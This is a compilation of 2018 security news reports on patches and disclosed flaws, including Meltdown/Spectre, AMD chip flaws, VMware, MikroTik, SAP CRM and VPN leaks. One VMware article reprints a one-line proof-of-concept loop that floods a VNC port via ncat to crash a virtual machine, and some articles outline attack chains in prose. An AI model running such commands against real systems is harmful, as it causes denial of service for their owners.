Meltdown and Spectre attacks exploit design flaws in Intel, AMD, ARM and other processors. They allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data.

Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). While Meltdown and Variant 1 can be addressed with software updates, Variant 2 also requires microcode updates from the manufacturers of the impacted processors. Software mitigations include kernel page-table isolation (KPTI/KAISER) and a technique developed by Google called Retpoline.

Meltdown and Spectre were discovered independently by three teams of researchers. Google Project Zero researcher Jann Horn was one of the experts who found the flaws, which meant the company had enough time to work on patches before the details of the vulnerabilities were disclosed.

In the case of Chrome OS, Google rolled out the first Meltdown mitigations with the release of version 63 in mid-December, more than two weeks before public disclosure.

At the time, Google rolled out the KPTI/KAISER patch to roughly 70 Intel-based Chromebook models from Acer, ASUS, Dell, HP, Lenovo, Samsung and others.

Google released Chrome OS 65 on Monday and informed users that it includes the KPTI mitigation against Meltdown for additional Intel devices with version 3.14 of the kernel.

A status page created by Google to help users track the availability of Meltdown and Spectre patches for Chrome OS shows that all older Chromebooks with Intel processors, including with kernel versions 3.14 and 3.8, should get the KPTI mitigation for Meltdown with the release of Chrome OS 66, which is currently scheduled for release on April 24.

Chrome OS 65 also brings the Retpoline mitigation for Spectre Variant 2 to all devices with Intel processors. Google noted that Variant 2 can be exploited using virtualization, and while Chrome OS devices don’t use this type of feature, some measures have been taken to proactively protect users.

In the case of Spectre Variant 1, the eBPF feature in the Linux kernel can be abused for exploitation, but Chrome OS is not impacted as it disables eBPF, Google said.

The tech giant informs customers that Chrome OS devices with ARM processors are not affected by Meltdown. As for the Spectre vulnerabilities, Google says it has started integrating the firmware and kernel patches supplied by ARM, but release timelines have not been finalized.


GitHub Security Alerts Lead to Fewer Vulnerable Code Libraries
22.3.2018 securityweek
Vulnerebility

GitHub says the introduction of security alerts last year has led to a significantly smaller number of vulnerable code libraries on the platform.

The code hosting service announced in mid-November 2017 the introduction of a new security feature designed to warn developers if the software libraries used by their projects contain any known vulnerabilities.

The new feature looks for vulnerable Ruby gems and JavaScript NPM packages based on MITRE’s Common Vulnerabilities and Exposures (CVE) list. When a new flaw is added to this list, all repositories that use the affected version are identified and their maintainers informed. Users can choose to be notified via the GitHub user interface or via email.

When it introduced security alerts, GitHub compared the list of vulnerable libraries to the Dependency Graph in all public code repositories.

The Dependency Graph is a feature in the Insights section of GitHub that lists the libraries used by a project. Since the introduction of security alerts, this section also informs users about vulnerable dependencies, including CVE identifiers and severity of the flaws, and provides advice on how to address the issues.

The initial scan conducted by GitHub revealed more than 4 million vulnerabilities in over 500,000 repositories. Affected users were immediately notified and by December 1, roughly two weeks after the launch of the new feature, more than 450,000 of the flaws were addressed either by updating the affected library or removing it altogether.

According to GitHub, vulnerabilities are in a vast majority of cases addressed within a week by active developers.

“Since [December 1], our rate of vulnerabilities resolved in the first seven days of detection has been about 30 percent,” GitHub said. “Additionally, 15 percent of alerts are dismissed within seven days—that means nearly half of all alerts are responded to within a week. Of the remaining alerts that are unaddressed or unresolved, the majority belong to repositories that have not had a contribution in the last 90 days.”

GitHub was recently hit by a record-breaking distributed denial-of-service (DDoS) attack that peaked at 1.3 Tbps, but the service was down for less than 10 minutes.


Google is distributing more Meltdown and Spectre Patches for Chrome OS devices
22.3.2018 securityaffairs
Vulnerebility

Google announced that mitigations for devices with Intel processors that are affected by the Spectre and Meltdown vulnerabilities will be available for latest stable channel update for Google’s Chrome OS operating system.
The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Meltdown attacks trigger the CVE-2017-5754 vulnerability, while Spectre attacks the CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). According to the experts, only Meltdown and Spectre Variant 1 can be addressed via software, while Spectre Variant 2 required an update of the microcode for the affected processors. Software mitigations include.

Google addressed the Meltdown issue in Chrome OS with the release of the version 63 in December, tens of days before researchers at Google Project Zero disclosure the flaws.

Chrome OS Spectre patches

Google rolled out the KPTI/KAISER patch to address the flaw in 70 Intel-based Chromebook models from various vendors, including Acer, ASUS, Dell, HP, Lenovo, and Samsung.

This week the company released Chrome OS 65 release that also includes the KPTI mitigation against Meltdown for a number of Intel-based systems that were not addressed in with version 3.14 of the kernel.

According to Google, all older Chromebooks with Intel processors should get the KPTI mitigation for Meltdown with the release of Chrome OS 66 that is scheduled for release on April 24.

“The Stable channel has been updated to 65.0.3325.167 (Platform version: 10323.58.0/1) for most Chrome OS devices. This build contains a number of bug fixes and security updates.” reads the Google announcement.

“Intel devices on 3.14 kernels received the KPTI mitigation against Meltdown with Chrome OS 65.

All Intel devices received the Retpoline mitigation against Spectre variant 2 with Chrome OS 65.”

Chrome OS 65 also includes the Retpoline mitigation for Spectre Variant 2 for all Intel-based devices. Google experts highlighted that for Spectre Variant 1 attack, hackers can abuse the eBPF feature in the Linux kernel, but Chrome OS disables eBPF.

Chrome OS devices running on ARM-based systems are not affected by Meltdown. Google is working to cover also Spectre issues.

“On ARM devices we’ve started integrating firmware and kernel patches supplied by ARM. Development is still ongoing so release timelines have not been finalized. ARM devices will receive updated firmware and kernels before they enable virtualization features.” concluded Google.


AMD Chip Flaws Confirmed by More Researchers
21.3.2018 securityweek
Vulnerebility

Another cybersecurity firm has independently confirmed some of the AMD processor vulnerabilities discovered by Israel-based CTS Labs, but the controversial disclosure has not had a significant impact on the value of the chip giant’s stock.

CTS Labs last week published a brief description of 13 allegedly critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The company says the flaws can be exploited for arbitrary code execution, bypassing security features (e.g. Windows Defender Credential Guard, Secure Boot), stealing data, helping malware become resilient against security products, and damaging hardware.

The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges to the targeted machine — physical access is not required. The security firm will not disclose technical details any time soon in order to prevent abuse.

CTS Labs, which no one heard of until last week, came under fire shortly after its disclosure for giving AMD only a 24-hour notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method.

While initially many doubted CTS Labs’ claims due to the lack of technical information, an increasing number of independent researchers have confirmed that the vulnerabilities do in fact exist. Nevertheless, there are still many industry professionals who believe their severity has been greatly exaggerated.

Trail of Bits was the first to independently review the findings. The company, which has been paid for its services, has confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.”

“Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits said in a blog post.

On Monday, Check Point also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.”

“In our opinion the original CTS Labs report might have been problematically phrased in a way that misrepresented the threat model and impact that the RYZENFALL-1 and RYZENFALL-3 vulnerabilities present,” Check Point said in a blog post. “However, problematic phrasing aside, after inspecting the technical details of the above, we can indeed verify that these are valid vulnerabilities and the risks they pose should be taken under consideration.”

Alex Ionescu, a reputable researcher and Windows security expert, also confirmed the findings and warned that “admin-level access and persistence are legitimate threats in multi-tenant IaaS and even things such as VTL0/1 (Credential Guard) when firmware and chipset trust boundaries are broken.”

AMD is investigating the claims, but it has yet to make any statement regarding the impact of the flaws.

Less than an hour after CTS Labs released its report, a controversial company named Viceroy Research published what it described as an “obituary” in hopes of leveraging the findings to short AMD stock. Since CTS’s report also included a disclaimer noting that the company had a financial interest, many assumed the two were working together to short AMD.

While CTS has avoided answering questions regarding its financial interests, Viceroy representatives told Vice’s Motherboard that the company obtained the report describing the vulnerabilities from an “anonymous tipster” and claimed to have no connection to the security firm.

Viceroy’s attempt has had an insignificant impact on AMD stock and experts doubt the situation will change. This is not actually surprising considering that Intel was hit the hardest by Meltdown and Spectre — critical vulnerabilities disclosed by reputable researchers — and still the impact on the company’s stock has been only minor and temporary.


AMD Says Patches Coming Soon for Chip Vulnerabilities
21.3.2018 securityweek
Vulnerebility

AMD Chip Vulnerabilities to be Addressed Through BIOS Updates - No Performance Impact Expected

After investigating recent claims from a security firm that its processors are affected by more than a dozen serious vulnerabilities, chipmaker Advanced Micro Devices (AMD) on Tuesday said patches are coming to address several security flaws in its chips.

In its first public update after the surprise disclosure of the vulnerabilities by Israeli-based security firm CTS Labs, AMD said the issues are associated with the firmware managing the embedded security control processor in some of its products (AMD Secure Processor) and the chipset used in some socket AM4 and socket TR4 desktop platforms supporting AMD processors.

Vulnerabilities found in Ryzen and other AMD processors

CTS Labs, which was unheard of until last week, came under fire shortly after its disclosure for giving AMD only a 24-hour notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method.

CTS Labs claimed that a number of vulnerabilities could be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware.

“AMD has rapidly completed its assessment and is in the process of developing and staging the deployment of mitigations,” the chipmaker wrote in an update on Tuesday. “It’s important to note that all the issues raised in the research require administrative access to the system, a type of access that effectively grants the user unrestricted access to the system and the right to delete, create or modify any of the folders or files on the computer, as well as change any settings.”

AMD said that patches will be released through BIOS updates to address the flaws, which have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA. The company said that no performance impact is expected for any of the forthcoming mitigations.

AMD attempted to downplay the risks, saying that any attacker gaining administrative access could have a wide range of attacks at their disposal “well beyond the exploits identified in this research.”

“Further, all modern operating systems and enterprise-quality hypervisors today have many effective security controls, such as Microsoft Windows Credential Guard in the Windows environment, in place to prevent unauthorized administrative access that would need to be overcome in order to affect these security issues,” the notice continued.

AMD also linked to a blog post from Trail of Bits, which was the first to independently review the findings from CTS. The company, which has been paid for its services, confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.”

“Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits added.

Check Point has also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.”

Alex Ionescu, a reputable researcher and Windows security expert, also confirmed the findings and warned that “admin-level access and persistence are legitimate threats in multi-tenant IaaS and even things such as VTL0/1 (Credential Guard) when firmware and chipset trust boundaries are broken.”

“This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings,” AMD stated last week.

Some have compared the recent AMD vulnerabilities to Meltdown and Spectre, which impact CPUs from Intel, AMD, ARM and others. However, some argued that the issues disclosed by CTS Labs are nowhere near as severe due to the fact that they mostly impact AMD’s Secure Processor technology rather than the hardware itself.

AMD did not provide specific dates that patches are expected to be released, but said it would provide additional updates on both its analysis of the issues and the related mitigation plans in the coming weeks.


Siemens Patches Flaws in SIMATIC Controllers, Mobile Apps
21.3.2018 securityweek
Vulnerebility

German industrial giant Siemens has released security patches for several of its SIMATIC products, including some controllers and a mobile application.

Organizations using SIMATIC products were informed by both Siemens and ICS-CERT this week of a denial-of-service (DoS) vulnerability that can be exploited by sending specially crafted PROFINET DCP packets to affected systems.

The flaw, tracked as CVE-2018-4843 and classified as medium severity, can be exploited by an attacker who has access to the network housing the targeted device. While DoS vulnerabilities are generally seen as less severe compared to code execution and other types of flaws, in the case of industrial control systems (ICS), they can have serious impact.

The security hole affects several SIMATIC central processing units (CPUs) and software controllers, SINUMERIK CNC automation solutions, and Softnet PROFINET IO controllers. Siemens has released patches for some of the impacted systems, and provided workarounds and mitigations for the rest.

Siemens also informed customers on Tuesday of an access control vulnerability affecting the Android and iOS versions of its SIMATIC WinCC OA UI mobile application. This app is designed to allow users to remotely access WinCC OA facilities from their mobile devices.

“The latest update for the Android app and iOS app SIMATIC WinCC OA UI fix a security vulnerability which could allow read and write access from one HMI project cache folder to other HMI project cache folders within the app’s sandbox on the same mobile device,” Siemens wrote in its advisory.

“This includes HMI project cache folders of other configured WinCC OA servers. Precondition for this scenario is that an attacker tricks an app user to connect to an attacker-controlled WinCC OA server,” it added.

The SIMATIC WinCC OA UI application vulnerability was discovered by experts at IOActive and Embedi as part of their research into SCADA mobile apps. They analyzed applications from 34 vendors and found security holes in a vast majority of them.


Code Execution Flaws Found in ManageEngine Products
21.3.2018 securityweek
Vulnerebility

Researchers at cybersecurity technology and services provider Digital Defense have identified another round of vulnerabilities affecting products from Zoho-owned ManageEngine.

ManageEngine provides network, data center, desktop, mobile device, and security solutions to more than 40,000 customers, including three out of every five Fortune 500 company.

Earlier this year, Digital Defense reported finding several potentially serious flaws in ManageEngine’s ServiceDesk Plus help desk software, and on Wednesday the company disclosed the details of six additional security holes found by its researchers in ManageEngine Log360, EventLog Analyzer, and Applications Manager products.

The vulnerabilities have been described by Digital Defense as file upload, blind SQL injection, local file inclusion, and API key disclosure issues that can be exploited without authentication for arbitrary code execution and obtaining potentially sensitive information.

According to the security firm, the Log360 and EventLog Analyzer log management products are affected by an unauthenticated file upload vulnerability that can be exploited to upload a JavaServer Pages (JSP) web shell to the root directory. This is possible due to the fact that a file upload feature’s security checks can be easily bypassed.

The rest of the flaws discovered by Digital Defense researchers impact ManageEngine Applications Manager and many of them can be exploited for arbitrary code execution.

Experts have identified several blind SQL injection flaws that can be leveraged by unauthenticated attackers to execute arbitrary code with SYSTEM privileges and gain complete control of the targeted host.

The list of security holes also includes a local file inclusion issue that can be exploited to download files that may contain sensitive information.

Researchers also discovered that an attacker can obtain an Applications Manager user’s API key by sending a specially crafted GET request.

“Depending on the privilege level of the compromised user, this could result in full compromise of both the Applications Manager web application and the host running it,” Digital Defense warned.

The vulnerabilities were reported to ManageEngine on February 12 and fixes were developed a few weeks later. Patches were made available to customers on March 7.


AMD will release the patches for the recently discovered flaws very soon
21.3.2018 securityaffairs 
Vulnerebility

AMD concluded its investigation on the vulnerabilities recently discovered by CTS Labs and announced that security patches will be released very soon.
AMD has finally acknowledged 13 critical vulnerabilities and exploitable backdoors in its Ryzen and EPYC processors that were first disclosed earlier March by the researchers at the security firm CTS Labs.

The CTS Labs researchers did not disclose any technical details about the vulnerabilities to avoid abuses in the wild.

The vendor plans to roll out firmware updates in the incoming weeks to address the flaws affecting millions of devices worldwide.

The flaws could be potentially exploited to steal sensitive data, install malicious code on AMD-based systems, and gain full access to the compromised systems. The flaws expose servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors to attacks.

CTS-Labs promptly reported the flaws to AMD, Microsoft and “a small number of companies that could produce patches and mitigations.”

The analysis conducted by the security experts revealed four classes (RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY) of vulnerabilities affecting the AMD Zen architecture processors and chipsets that usually contain sensitive information such as passwords and encryption keys.

The flaw could allow to bypass AMD’s Secure Encrypted Virtualization (SEV) technology and also Microsoft Windows Credential Guard. AMD flaws

This week AMD published a press release trying to downplay the severity of the flaws.

“It’s important to note that all the issues raised in the research require administrative access to the system, a type of access that effectively grants the user unrestricted access to the system and the right to delete, create or modify any of the folders or files on the computer, as well as change any settings.” reads the press release published by AMD. “Any attacker gaining unauthorized administrative access would have a wide range of attacks at their disposal well beyond the exploits identified in this research.”

Differently from what has happened for Meltdown and Spectre attacks, AMD sustains that the patches it is going to release are not expected to impact system performance.

CTS Labs are skeptical about a rapid fix of the issues, they claimed that AMD could take several months to release patches for most of the flaws, even some of them could not be fixed.


A flaw in Ledger Crypto Wallets could allow to drain your cryptocurrency accounts. Fix it!
21.3.2018 securityaffairs 
Vulnerebility
Saleem Rashid, a 15-year-old researcher from the UK, has discovered a severe vulnerability in cryptocurrency hardware wallets made by the Ledger company.
Hardware wallets enable transactions via a connection to a USB port on the user’s machine, but they don’t share the private key with the host machine impossible malware to harvest the keys.

Saleem Rashid has found a way to retrieve the private keys from Ledger devices once obtained a physical access to the device.

The researchers discovered that a reseller of Ledger’s devices could update the devices with malware designed to steal the private key and drain the user’s cryptocurrency accounts when the user will use it.

Giving a close look at the Ledger’s hardware device, Saleem Rashid discovered that they include a secure processor chip and a non-secure microcontroller chip. The nonsecure chip is used for different non-security tacks such as displaying text on the display. The problem ties the fact that the two chips exchange data and an attacker could compromise the insecure microcontroller on the Ledger devices to run malicious code in stealth mode.

Even is Ledger devices implement a way to protect the integrity of the code running on them, the expert developed a proof-of-concept code to bypass it and run malicious code on the products.

nano s ledger wallet

The PoC code was published along with the official announcement from Ledger about the availability of a new firmware update that addresses the vulnerability.

“You’re essentially trusting a non-secure chip not to change what’s displayed on the screen or change what the buttons are saying,” Rashid told to the popular cyber security expert Brian Krebs. “You can install whatever you want on that non-secure chip, because the code running on there can lie to you.”

Rashid published a research paper on the flaw and a video PoC of the attack against a Nano-S device, one of the most popular hardware wallets sold by the company.

“This attack would require the user to update the MCU firmware on an infected computer. This could be achieved by displaying an error message that asks the user to reconnect the device with the le/ button held down (to enter the MCU bootloader). Then the malware can update the MCU with malicious code, allowing the malware to take control of the trusted display and confirmation buttons on the device.” wrote the researcher.
This attack becomes incredibly lucrative if used when a legitimate firmware update is released, as was the case two weeks ago.”

“As you can tell from the video above, it is trivial to perform a supply chain attack that modifies the generated recovery seed. Since all private keys are derived from the recovery seed, the attacker could steal any funds loaded onto the device.” continues the expert.

The Ledger MCU exploit relies on the fact that the process for generating a backup code for a user’s private key leverages on a random number generator that can be forced to work in a predictable way and producing non-random results.

Curiously, when Rashid first reported his findings to Ledger, the company dismissed them.

“the firmware update patches three security issues. The update process verifies the integrity of your device and a successful 1.4.1 update is the guarantee that your device has not been the target of any of the patched attack. There is no need to take any other action, your seed / private keys are safe.” reads the security advisory published by the French company.

“Thimotee Isnard and Sergei Volokitin followed the responsible disclosure agreement process and were awarded with a Bounty, while Saleem Rashid refused to sign the Ledger Bounty Program Reward Agreement.”

Rashid pointed out that Ledger doesn’t include anti-tampering protection to avoid that an attacker could physically open a device, but the company replied that such kind of measures is very easy to counterfeit.

In this case, let me suggest buying the devices directly from the official vendor and not from third-party partners and update them with the last firmware release.


VMware addresses a DoS flaw in Workstation and Fusion products
18.3.2018 securityaffairs
Vulnerebility

VMware has addressed a denial-of-service (DoS) vulnerability, tracked as CVE-2018-6957, in its Workstation 12.x and 14.x and Fusion 10.1.1. and 10.x on OS X products.
The affected VMware solutions can be attacked by opening a large number of VNC sessions. The DoS vulnerability was discovered by Lilith Wyatt of Cisco Talos, the flaw could be exploited on Workstation and Fusion only if the VNC has been manually enabled.

VNC implementation in VMware solutions is used for remote management purposes.

“VMware Workstation and Fusion contain a denial-of-service vulnerability which can be triggered by opening a large number of VNC sessions.” reads the security advisory published by VMware.

The company issued the security patches in Workstation 14.1.1 and Fusion 10.1.1., VMware also shared details about a workaround for Workstation 12.x and Fusion 8.x releases that involves setting a password for the VNC connection.

While VMware has classified the vulnerability as “important,” Cisco Talos has ranked it as a “high severity” flaw and assigned it a CVSS score of 7.5.

Experts at Cisco Talos confirmed that an attacker can trigger the flaw on a targeted server and cause the virtual machine to shut down by opening a large number of VNC sessions.

“Since the VMware VNC server is naturally multi-threaded, there are locks and semaphores and mutexes to deal with shared variables.” reads the advisory published by Talos.

“The VNC server also maintains a global variable that indicates the amount of locks that are currently used, that is incremented by certain events.”

VMware

Talos published the Proof-of-Concept exploit code:

# There are obviously better ways to do this
for x in `seq 0 $(( 0xffffff/2 ))`; do echo “doop” | ncat <targetIP> <VNCPort>; done
“Regardless, the important thing to note here is that the incrementing instruction (lock xadd cs:MxLockCounter, eax😉 is the only cross-reference to the MxLockCounter global variable, meaning it never gets decremented.” continues Talos.

“Thus, as long as and attacker can initiate a bunch of TCP connection to the VNC server (each successful connection increments it twice), without even sending any other datagrams, an attacker can eventually shutdown the connected virtual machine.”

Below the timeline for the flaw:

2017-07-13 – Vendor Disclosure
2018-03-15 – Public Release


Warning – 3 Popular VPN Services Are Leaking Your IP Address
17.3.2018 thehackernews
Vulnerebility

Researchers found critical vulnerabilities in three popular VPN services that could leak users' real IP addresses and other sensitive data.
VPN, or Virtual Private Network, is a great way to protect your daily online activities that work by encrypting your data and boosting security, as well as useful to obscure your actual IP address.
While some choose VPN services for online anonymity and data security, one major reason many people use VPN is to hide their real IP addresses to bypass online censorship and access websites that are blocked by their ISPs.
But what if when the VPN you thought is protecting your privacy is actually leaking your sensitive data and real location?
A team of three ethical hackers hired by privacy advocate firm VPN Mentor revealed that three popular VPN service providers—HotSpot Shield, PureVPN, and Zenmate—with millions of customers worldwide were found vulnerable to flaws that could compromise user's privacy.
The team includes application security researcher Paulos Yibelo, an ethical hacker known by his alias 'File Descriptor' and works for Cure53, and whereas, the identity of third one has not been revealed on demand.
PureVPN is the same company who lied to have a 'no log' policy, but a few months ago helped the FBI with logs that lead to the arrest of a Massachusetts man in a cyberstalking case.
After a series of privacy tests on the three VPN services, the team found that all three VPN services are leaking their users' real IP addresses, which can be used to identify individual users and their actual location.
Concerning consequences for end users, VPN Mentor explains that the vulnerabilities could "allow governments, hostile organizations [sic], or individuals to identify the actual IP address of a user, even with the use of the VPNs."
The issues in ZenMate and PureVPN have not been disclosed since they haven't yet patched, while VPN Mentor says the issues discovered in ZenMate VPN were less severe than HotSpot Shield and PureVPN.
The team found three separate vulnerabilities in AnchorFree's HotSpot Shield, which have been fixed by the company. Here's the list:
Hijack all traffic (CVE-2018-7879) — This vulnerability resided in Hotspot Shield’s Chrome extension and could have allowed remote hackers to hijack and redirect victim's web traffic to a malicious site.
DNS leak (CVE-2018-7878) — DNS leak flaw in Hotspot Shield exposed users' original IP address to the DNS server, allowing ISPs to monitor and record their online activities.
Real IP Address leak (CVE-2018-7880) — This flaw poses a privacy threat to users since hackers can track user's real location and the ISP. the issue occurred because the extension had a loose whitelist for "direct connection." Researchers found that any domain with localhost, e.g., localhost.foo.bar.com, and 'type=a1fproxyspeedtest' in the URL bypass the proxy and leaks real IP address.
Here it must be noted that all the three vulnerabilities were in the HotSpot Shield's free Chrome plug-in, not in the desktop or smartphone apps.
The researchers also reported similar vulnerabilities in the Chrome plugins of Zenmate and PureVPN, but for now, the details of the bugs are being kept under wraps since both the manufacturers have not yet fixed them.
Researchers believe that most other VPN services also suffer from similar issues.


Remotely Exploitable Vulnerability Discovered in MikroTik's RouterOS
16.3.2018 securityweek
Exploit  Vulnerebility

A vulnerability exists in MikroTik's RouterOS in versions prior to the latest 6.41.3, released Monday, March 12, 2018. Details were discovered February and disclosed by Core Security on Thursday.

MikroTik is a Latvian manufacturer that develops routers and software used throughout the world. RouterOS is its Linux-based operating system.

The vulnerability, a MikroTik RouterOS SMB buffer overflow flaw, allows a remote attacker with access to the service to gain code execution on the system. Since the overflow occurs before authentication, an unauthenticated remote attacker can exploit it.

The vulnerability exists because the first byte of the source buffer is read and used as the size for the copy operation to the destination buffer -- but ultimately, no validation is performed to ensure that the data fits into the destination buffer, potentially allowing a stack overflow.

Core's vulnerability advisory includes a proof of concept exploit against MikroTik's x86 Cloud Hosted Router. The function is reached by sending a NetBIOS session request message. Data execution prevention (DEP) is bypassed with a return-oriented programming (ROP) chain that calls 'mprotect' to mark a memory region as both writable and executable. Address space layout randomization (ASLR) can be neutralized because the base address of the heap is not randomized. This allows a payload on the heap to jump to a fixed location.

"Our testing," says Core's advisory, "showed this approach to be extremely reliable." The reserved CVE number is CVE-2018-7445.

Core sent its initial vulnerability notice to MikroTik on February 19, 2018. On the same day, Core noticed the flaw was already scheduled for a fix by MikroTik in a new software release candidate. Core asked for a coordinated publication of the new version and its own advisory. It proposed March 1, 2018, which was confirmed by MikroTik. MikroTik then asked for an extension to Thursday, March 8, 2018, and then told Core it still wouldn't be ready.

On Monday, March 12, 2018, it released the new version. It did not inform Core, and there is no apparent mention of the flaw or the fix in its new version announcement to customers -- but it subsequently confirmed that the flaw has been fixed. MikroTik's advice for customers that cannot upgrade is that they should turn off SMB.

Last week, Kaspersky Lab released a report on a hacking group it calls Slingshot. It has identified around 100 victims. The attackers gain access by first getting control of MikroTik routers, and using that position to download DLL files to the target computer via MikroTik's Winbox management tool.

It is not clear at this point whether the Slingshot group gained access to the MikroTik routers using the CVE-2018-7445 vulnerability, but it is tempting to think so. Kaspersky Lab informed the company about its research prior to its own publication.

While the router vulnerability would be the first stage of the attack, the second stage would be the use of Winbox to get the malicious downloads. MikroTik claims on its support forum that Winbox is secure. In a thread started by a customer disturbed at learning about Slingshot from reports in the media rather than from MikroTik, MikroTik responded, "There is NO insecure Winbox v3. Winbox v3 was released in 2014. Even if somebody was using a really old Winbox v2, they still had to have an unsecured RouterOS device so that somebody could compromise it (firewall had to be removed). This is why they found only 120 affected machines since 2012."

The bottom line is that MikroTik is quick fix to issues it knows about, but prefers to maintain a low profile over those problems. The danger here is that existing customers might not be aware of the issues, and be in no hurry to upgrade. MikroTik customers should be aware that a proven proof of concept exploit for vulnerability CVE-2018-7445 is in the public domain, and the 'patch' for this exploit is to upgrade RouterOS to version 6.41.3.


VMware Patches DoS Vulnerability in Workstation, Fusion
16.3.2018 securityweek
Vulnerebility

VMware informed customers on Thursday that it has patched a denial-of-service (DoS) vulnerability in its Workstation and Fusion products. Details of the flaw and proof-of-concept code have been made public.

In its advisory, VMware said the vulnerability affects Workstation 12.x and 14.x on all platforms, and Fusion 8.x and 10.x on OS X. Patches are included in Workstation 14.1.1 and Fusion 10.1.1. A workaround that involves setting a password for the VNC connection can be applied to Workstation 12.x and Fusion 8.x releases.

The flaw, tracked as CVE-2018-6957, was discovered by Lilith Wyatt of Cisco Talos. VMware says it can be exploited to cause a DoS condition by opening a large number of VNC sessions. VNC, which is used in VMware products for remote management and automation purposes, must be manually enabled for the exploit to work.

While VMware has classified the vulnerability as “important,” Cisco Talos has assigned it a CVSS score of 7.5, which puts it in the “high severity” category.

In its own advisory, Cisco said an attacker can trigger an exception on a targeted server and cause the virtual machine to shut down by initiating numerous VNC sessions.

“Since the VMware VNC server is naturally multi-threaded, there are locks and semaphores and mutexes to deal with shared variables. The VNC server also maintains a global variable that indicates the amount of locks that are currently used, that is incremented by certain events,” Talos explained.

The code uses a variable to count the locks and ensure that their number is not too high. Wyatt discovered that each TCP connection to the VNC increments this variable twice, and initiating a large number of connections will eventually lead to a DoS condition and a shutdown of the VM. Cisco’s advisory includes a one-line PoC exploit.

VMware sponsored the recent Pwn2Own 2018 hacking competition and offered up to $70,000 for VMware Workstation exploits. However, none of the contestants targeted the company’s products. At last year’s event, white hat hackers did disclose exploits that included VMware virtual machine escapes.


Hacking SAP CRM by chaining 2 vulnerabilities in SAP NetWeaver AS Java
16.3.2018 securityaffairs 
Vulnerebility

Security experts at ERPScan explained that chaining 2 flaws recently patched it is possible to hack SAP CRM systems and access sensitive data.
Security experts at ERPScan discovered that chaining the exploits for two security vulnerabilities in SAP NetWeaver Application Server Java patched last month, an attacker can hack customer relationship management (CRM) systems.

CRMs are critical systems in business that are used to manage sensitive data such as clients’ personal information, prices, contact points.

The flaws are a directory traversal issue and a log injection vulnerability, their combination could lead to information disclosure, privilege escalation, and full compromise SAP CRM installations.

The flaws considered singularly are not particularly severe, they received CVSS Base Scores v.3 respectively of 6.3 and 7.7.

“The security researchers at ERPScan identified directory traversal and log injection vulnerabilities in the solution. The two issues in combination lead to information disclosure, privilege escalation, and complete SAP systems compromise. The two vulnerabilities can wreak havoc in any company running SAP CRM.” explained Vahagn Vardanyan, senior security researcher of ERPScan.

According to ERPScan, there are more than 500 vulnerable SAP CRM systems exposed online.

The experts provided details about the full attack scenario is that is composed of the following steps:

An attacker uses the first directory traversal vulnerability to read administrator credentials in an encrypted form.
He or she decrypts the credentials since the algorithm is known and the key is stored in the same directory. More about decrypting SecStore can be found here.
The attacker logs in SAP CRM portal.
The attacker exploits another directory traversal vulnerability and changes SAP log file path to the web application root path.
Finally, using special request, he or she can inject a malicious code (a web-shell) into the log file and call it anonymously from a remote web server.
ERPScan shared details of the vulnerabilities with SAP helping it for the development of the security patches.

ERPScan researchers disclosed details of the vulnerabilities during a talk at the Troopers security conference. The researchers explained how remote attackers can chain the flaws read any file on unpatched SAP CRM without authentication.


Intel Shares Details on New CPUs With Spectre, Meltdown Protections
15.3.2018 securityweek
Vulnerebility

Intel announced on Thursday that patches designed to address the Spectre vulnerability are now available for all the affected CPUs released in the past five years, and shared more details on the future processors that will include protections against these types of attacks.

Intel CEO Brian Krzanich informed customers that the company has made available microcode updates for “100 percent” of the recent processors vulnerable to Meltdown and Spectre attacks.

The company first released new firmware updates for its Skylake processors, then for Kaby Lake and Coffee Lake, and later for Broadwell and Haswell CPUs. The fixes will be delivered by device manufacturers, but Microsoft has also started providing the microcode patches for Windows 10 devices with Skylake, Coffee Lake and Kaby Lake processors.

Intel building CPUs with Meltdown and Spectre protections

In late January, Krzanich revealed that the company had started working on processors with built-in protections for attacks similar to Meltdown and Spectre. Additional details have now been provided and Intel even published a video that explains on a high level how these side-channel attacks work and how it plans on preventing them.

Meltdown attacks rely on a vulnerability identified as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Variant 1 can be addressed with software patches, but Variant 2 also requires microcode updates.

